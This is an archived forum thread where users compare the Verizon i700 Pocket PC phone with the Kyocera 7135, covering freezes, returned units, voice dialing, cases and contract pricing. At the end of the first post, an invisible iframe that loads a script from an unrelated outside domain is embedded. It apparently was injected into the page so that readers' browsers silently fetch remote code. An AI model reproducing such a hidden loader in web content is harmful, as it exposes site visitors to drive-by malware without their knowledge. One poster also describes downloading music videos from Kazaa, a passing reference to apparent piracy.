Does anyone dislike the phone?

Notice I didn't say the PDA, but the phone aspect of it. I guess the main reason I'm writing this is in case someone else is debating whether to get the 7135 or i700. I have only lived with the i700 for a day and a half and I've got to admit that I'm not a big fan of the phone or the general functionality of the device. I do a lot of traveling and talk on the phone a lot (over 1600 minutes each month, with skimping at the end of the month otherwise I'd be over 2000). I need the phone to be more accessible and easy to use. I also need an easier way to switch from loud ringing (listening to jamz in the car) to vibrate (for meetings). I don't like having such a menu driven process for tasks that should be easier to reach i.e. phone settings. The only reason I really use a PDA (currently a Sony Clie' - never used a Pocket PC before) is to keep track of phone numbers, where I'm going, and where I've been. I'm convinced that if I stay with this phone I will run off the road and destroy something. I just shouldn't have to drive with the man purse open on my lap in order to check voicemail, see the caller ID, or verify if the voice recognition software actually heard me correctly (been right 100% so far). The reason I had to verify who the heck it was dialing is because it repeats your contact's name in an awkward computer voice that I can't always understand.

Will the 7135 cost more? Absolutely. I can get a 7135 for $399.99 after $100 mail-in-rebate. The i700 was $529.99. If I get a Veo Camera ($100) as shown in the commercials and a spare battery, I'm way over the $130 difference. To me, it isn't "all about the benjamins."

Positives on the i700: It's shorter than the 7135! Open the 7135 to talk on it like a regular flip-phone and you'll see that it's actually longer. It is a bit narrower than the i700 however. There are great programs for the Pocket PC and it can be customized in numerous ways. I'm sure there are other strengths that you techies can discuss, but I'm just a traveling salesperson sellling shower curtain rings door-to-door.

Anyway, the bottom line is that if you need a phone get the Kyocera. If you need a PDA/Computer/almost laptop replacement get the i700. I totally think the i700 will get more oohs and aahs, but the ease of use just isn't there for me. If anyone is reading this for guidance, remember that I have also never owned nor used a Pocket PC before, so some of the quirkiness has also added to my displeasure.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Before you dive into a 7135.....

Before you dive into a 7135, consider the conversation I had with the assistant manager of my local Verizon store 2 days ago. So far, they've sold 20 7135's. Of these, 10 HAVE COME BACK! That's a 50% reject rate! Users complaining about freezes, lockups, and data loss....and they had to swap them all out! It was his feeling that all the problems that delayed the 7135's intro from Verizon for 5 full months have not been fixed yet and that the 7135 is exclusively for 'Palm Heads'. Having used both of them extensively, he says there's absolutely no comparison.....the i700 IS IT!

So far, NONE of the eight i700's they've sold or ordered from fulfilment have come back, not one customer has come in to complain.

Maybe its just me, but for the past two days I have been driving and using the phone witht he headset extensively. I have been giving it a thorough workout for the time frame I have the option to return it. I absolutely love it.

One thing I would love to be able to do is hit the button on the headset to voice dial instead of having to hit the button ont he side of the i700. Other then that and the fact I cant see who is calling when receiving and incoming call, I couldnt be happier. I have had 0 time with my eyes off the road, and once you get used to the voice activation you can call anyone in your phone book or digit dial anyone without error.

Now I'm just tyrign to get the darn wireless sync working and I will be set!!

Interesting you mentioned freezed because mine did it twice today from call waiting. Somewhere close to the phone number I called it said "call waiting." But I didn't get the box to select answer or ignore. I actually had to disconnect the battery to get the phone to unlock.

Another thing, I'm always hitting buttons accidently. Even if the phone is in the man purse.

Another thing, I've called the i700 several times from my home phone and the thing didn't even ring. Honestly, I'm not TRYING to find reasons to take this back. I've missed several phone calls today to the tune of 7 voicemails in 2 hours...

I sent mine back and decided to stay with the T-Mobile Phone Edition for now. I do love the i700, but for now I'm going to stay in my plan. The delta wasn't enough to push me there, especially in light of no GPS available. When that part is fixed, I'll probably revisit the decision.

If you had to use it outside a lot, that might do it too. The display is hard to see in direct sun when compared to the T-Mobile.

Most other points come down in favor of the i700. I wouldn't say I don't like it, because I truely do love the i700 a lot. I just need to stay the other way for now.... and the Benjamins are a factor in this as well.

Lighter..you are right, as far a phone convience, the 7135 is great. I knew about the 7135 and I700 comming to Verizon a long way back. In fact I was abel to play with the 7135 mid last yeard...and was very excited to get one. (One of my conditions for brinning all my cell phone accounts to verizon was that I get a 7135 once it came out). But this is the ordeal I went through:

7135 #1: Fresh out of the box turned off whenever I moved it..returned to the store the same day

7135 #2: had it for 3 days, then when I loaded quickoffice premier to do excel sheets..fatal error..kyocera had me do a couple of things..then instructed me to return it.

7135 #3: had phone for 2 days..again..fatal errors.. I also discovered what the 4475 error meant: "me no likey third party app..so me stick tounge out at you", funny that I found this info on the kyocera website and the techs from kyocera did not know what it was.

7135 #4: Had the phone for a day in a half..discovered that battery on this unit was unusually warm..to the point that it made my hand sweat after 5 minutes..when I got to the store to have it sent back it created fatal error again as well

7135 #5: Fatal error out of the box..not encouraging..but I tried it for a couple more days, phone had to be reset 3 times daily..and this happened when I was moving from one app to another..and I did not install any third party apps.

7135 #6: this one lasted a day without any problems (however, the contrast setting on the phone seems goofy, at times when I open it its super bright, solution..either open and close the phone a couple of times or go to the contrast settings..tap on the bar and it returns to normal..second day..fatal error returns..but a whole new code..4465 (if I remember correctly)..I called verizon tech support..after much waiting the tech said that there have been issues (sacastic thought: really? I havent noticed.. ) with the software and kyocera is supposed to be working on it..BUT there still may be a chance I have a faulty unit..so I can exchange it once again if I liked...hmmm.

One other thing..the phones have a known issue that they have a hard time holding onto and search for towers...you will notice the phone doing "searching" as you travel becuase it cant keep up with the pace..its not terribly bad..but it does happen from time to time.

these are my whoas on the 7135, please dont take this as a put down on the phone..I still like the concept, and customer service has TRIED to be helpful..but I am getting tired of having a 2235 as my main phone, this is why I am looking the other way..oh..and the car kit for the I700..that has tempted me further...the 7135 only has one of the portable ones..I like the permanent mount units

And that is why I am now with the I700...one other thing, you mentioned that you have a hard time place the phone on "vibrate"...all I do is press the side VOL bar and then tap vibrate..and thats it..just a littel info in case you missed it.

BUT if you are just looking to keep contacts and some palm functionality (do not play with to many third party apps) the 7135 should be fine...

My primary dislike...

My biggist dislike of the i700 is that it's taking quality time away from my other "toys". I find myself using it all the time now... it's almost addictive. Really, the only major dislike I've had is the case, but I have managed to adjust to it until something better comes along.

You can also easily put it on vibrate by hitting the volume button on the side. With it you can adjust how loud it is ringing, to vibrate, to silent. I love this feature.

I love it. My latest hobby is downloading Music Videos from Kazaa, converting them into 6mb .wmv files and IR transferring them to the storage card. I'll have a freaking VIDEO JUKEBOX before too long!

I am adapting to using this phone each day. I received it 5 days ago, and so far i have made the following use of it:

1) Changed the calendar key to the voice recognition app - this makes it easy for me to bring up any app that i use. Changed the contacts key to bring up the camera
2) Added a 256M SD card with Pocket streets maps, mp3's, photos, and templates
3) Installed AOL 2.0 to access email (yes I also have an aol account-) but have yet to get it connected.
4) Tried about 6 different cases for it (IPaq style, and Jornada style, and zip up day runner style - and have yet to get the case dialed in).
5) Took several fun photos with my friends (using AS mode of the camera) and tried emailing them (via active sync)
6) Talking on the phone in the car with a sony head set cause it is so light
7) Talking on the phone out of the car with it up to my ear (inside the case) feels wierd... like it is too big... I am still getting use to this
I havent tried it in direct sun, but i have tried it in bright and indirect sun and it is very readable...
9) Oh, I had to buy a fountain pen size stylus (combo) because the one that is built in is just way to tiny to hold on to. Also add some write shields incase I hold it up to my face a lot.

Positive Phone Response

Overall I am very happy with the phone for both service and usability. I am most impressed with the speaker phone which I use quite often.

What..? That's not fair! Well, many things in life aren't fair, but at least you could tell us what you did. So now I've seen many different prices for the i700.

$749 - Buy the phone w/o a contract
$629 - Buy the phone w/1 year contract
$599 - Buy the phone w/2 year contract
$550 - Buy through a 'very large corporate account'
$529 - ???
$500 - ??????
$300!!!! - ???????????????

Maybe if I can get some answers I will submit an FAQ on the pricing subject. Oh yeah, forgot the cheapest price...

$0.00 - Jack spectar's i700 if he doesn't tell me how he got his for $300...

ok..ok. not really a big deal. (actually dont want anyone to heist my phone) first off I told them that I would sign up all 3 of my accounts on two year contracts (not share plans) if:
1._ They gave me $200 credit towards the 7135 phone on my bill (they couldnt give me an instant discount on that unit in the store being that it was a direct fufill, so I paid $500 up front)

2._ An instant $100 rebate on two lg vx4400's (they just came out at that time so they had no rebates, but I forced them into one).

When the 7135 did not work out (after 6 of them ) they gave me the I700 as an even swap..so:

Purchased for 7135 $500
swaped for I700 for same price as the 7135
$200 was placed on my account for oppening thee three individual accconts

phone comes out to $300

$529 is the price that all the Verizon stores around Greenville, SC have for a 2 year contract.
